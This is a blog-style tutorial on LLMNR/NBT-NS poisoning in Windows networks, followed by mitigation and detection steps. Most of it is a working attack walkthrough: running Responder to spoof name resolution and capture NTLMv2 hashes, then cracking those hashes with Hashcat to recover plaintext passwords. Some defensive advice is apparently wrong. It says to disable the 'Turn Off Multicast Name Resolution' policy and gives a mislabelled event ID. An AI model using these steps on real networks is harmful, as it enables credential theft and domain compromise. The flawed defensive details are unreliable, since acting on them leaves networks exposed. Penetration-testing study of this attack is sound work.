Listen to this Post

Introduction:
LLMNR (Link-Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are protocols used in Windows networks for hostname resolution. Attackers can exploit these protocols to intercept authentication traffic, capture NTLMv2 hashes, and gain initial access to a domain. This article demonstrates how to perform LLMNR/NBT-NS poisoning, crack captured hashes, and secure your network against such attacks.
Learning Objectives:
- Understand how LLMNR/NBT-NS poisoning works.
- Learn to use Responder to intercept NTLMv2 hashes.
- Crack captured hashes using Hashcat to obtain plaintext credentials.
1. Setting Up Responder for LLMNR/NBT-NS Poisoning
Command:
sudo responder -I eth0 -wrf
Step-by-Step Guide:
1. Install Responder:
git clone https://github.com/lgandx/Responder.git cd Responder
2. Run Responder:
– `-I eth0` specifies the network interface.
– `-w` enables WPAD rogue server.
– `-r` enables rogue FTP server.
– `-f` enables fingerprinting.
3. Wait for Hashes: Responder will spoof responses and capture NTLMv2 hashes when users mistype hostnames.
2. Capturing NTLMv2 Hashes
Command:
sudo responder -I eth0 -v
Step-by-Step Guide:
- Monitor Traffic: Run Responder in verbose mode (
-v) to see real-time hash captures. - Trigger a Request: A victim mistyping a server name (e.g., `\\filesrv1` as
\\filesrv) sends a request, and Responder captures the hash. - Save Hashes: Captured hashes are stored in
/usr/share/responder/logs/.
3. Analyzing Captured NTLMv2 Hashes
Command:
cat /usr/share/responder/logs/HTTP-NTLMv2-192.168.1.100.txt
Step-by-Step Guide:
- Open the captured file to view the hash format:
username::DOMAIN:1122334455667788:NTLMv2_HASH:1122334455667788
2. Extract the hash for cracking.
4. Cracking NTLMv2 Hashes with Hashcat
Command:
hashcat -m 5600 hash.txt rockyou.txt -O
Step-by-Step Guide:
1. Install Hashcat:
sudo apt install hashcat
2. Prepare the Hash File: Save the NTLMv2 hash in hash.txt.
3. Run Hashcat:
– `-m 5600` specifies NTLMv2 mode.
– `rockyou.txt` is a common wordlist.
– `-O` enables optimized cracking.
4. Retrieve Plaintext Password: Once cracked, Hashcat displays the password.
5. Mitigating LLMNR/NBT-NS Poisoning Attacks
Windows Command (Disable LLMNR):
Set-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows NT\DNSClient" -Name "EnableMulticast" -Value 0
Step-by-Step Guide:
1. Open Group Policy Editor (`gpedit.msc`).
2. Navigate to:
Computer Configuration → Administrative Templates → Network → DNS Client
3. Disable “Turn Off Multicast Name Resolution”.
- Enforcing SMB Signing to Prevent Relay Attacks
Windows Command:
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
Step-by-Step Guide:
1. Open PowerShell as Admin.
2. Run the command to enforce SMB signing.
3. Verify with:
Get-SmbServerConfiguration | Select-Object RequireSecuritySignature
7. Monitoring and Detecting LLMNR/NBT-NS Spoofing
SIEM Query (Splunk Example):
index=windows EventCode=4657 OR EventCode=4768 | stats count by src_ip, dest_ip
Step-by-Step Guide:
1. Enable Windows Auditing:
auditpol /set /category:"Account Logon" /success:enable /failure:enable
2. Monitor Event Logs: Look for Event ID 4657 (SMB Auth Failures) or 4768 (Kerberos TGT Requests).
What Undercode Say:
- Key Takeaway 1: LLMNR/NBT-NS poisoning remains a critical attack vector in internal networks due to default Windows settings.
- Key Takeaway 2: Cracking NTLMv2 hashes with Hashcat can lead to full domain compromise if weak passwords are used.
Analysis:
Despite being a known attack for years, many organizations still leave LLMNR/NBT-NS enabled, making lateral movement easy for attackers. Defenders must enforce SMB signing, disable unnecessary protocols, and monitor for suspicious authentication attempts.
Prediction:
As AI-powered password cracking improves, attackers will leverage tools like Hashcat with GPU clusters to crack hashes faster. Organizations must adopt multi-factor authentication (MFA) and Windows Hello for Business to mitigate credential theft risks.
By following these steps, security professionals can both exploit and defend against LLMNR/NBT-NS attacks, strengthening their penetration testing and defensive strategies.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Jasmine Baptiste – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


